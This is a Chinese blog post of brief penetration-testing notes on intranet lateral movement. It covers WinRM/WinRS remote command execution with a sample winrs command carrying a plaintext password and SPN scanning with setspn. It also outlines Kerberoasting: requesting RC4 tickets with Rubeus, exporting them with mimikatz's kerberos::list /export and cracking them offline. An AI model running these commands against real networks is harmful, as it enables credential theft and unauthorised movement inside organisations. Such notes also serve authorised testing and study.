当前位置: 首页 > article >正文

内网安全-横向移动Kerberos 攻击SPN 扫描WinRMWinRSRDP

article 2025/3/21 4:13:00

1.WinRM&WinRS

条件:

双方开启winrm winrs服务

2008版本以上默认开启,win 7默认关闭

检测使用cs内置端口扫描5985开放情况

进行连接

winrs -r:http://192.168.93.30:5985 -u:administrator -p:Whoami2021 whoami

2.内网-spn

shell setspn -T god.org -q */*

探测主机

rc4可以被逆向aes256不可

3.kerbercast攻击条件:

使用rc4进行加密类型票据,工具Rubeus检测或者看加密类型

1.扫描:

shell setspn -T god.org -q */*

2.使用工具检测

Rubeus kerbercast

3.使用手工进行判断请求

使用klist查看

使用mimkaz进行导出和查看

导出

kerberos::list /export

使用脚本进行破解


http://www.kler.cn/a/593466.html

相关文章:

  • 详细解析GetOpenFileName()
  • 如何打造安全稳定的亚马逊采购测评自养号下单系统?
  • Solana笔记案例:写一个SOL转账程序
  • C#:使用UDP协议实现数据的发送和接收
  • 量子计算专业书籍,做个比较
  • C++ 核心编程 ——4.9 文件操作
  • 主流NoSQL数据库类型及选型分析
  • 接口测试工具:Jmeter
  • UI设计中的模态对话框:合理使用指南
  • 举例说明 牛顿法 Hessian 矩阵
  • 【微信小程序变通实现DeepSeek支持语音】
  • Python、MATLAB和PPT完成数学建模竞赛中的地图绘制
  • Canary Capital 向 SEC 递交首个 SUI ETF 申请文件
  • Oracle ASM Failgroup故障组
  • mesh开发解析
  • Dropshare for Mac v6.1 文件共享工具 支持M、Intel芯片
  • Linux killall 命令使用详解
  • 如何解决Kafka Rebalance引起的重复消费
  • 如何在 Web Component 中优雅地使用 React
  • 解决 VS Code 中 GitHub Copilot Chat 遇到的 `claude-3.7` 模型不支持问题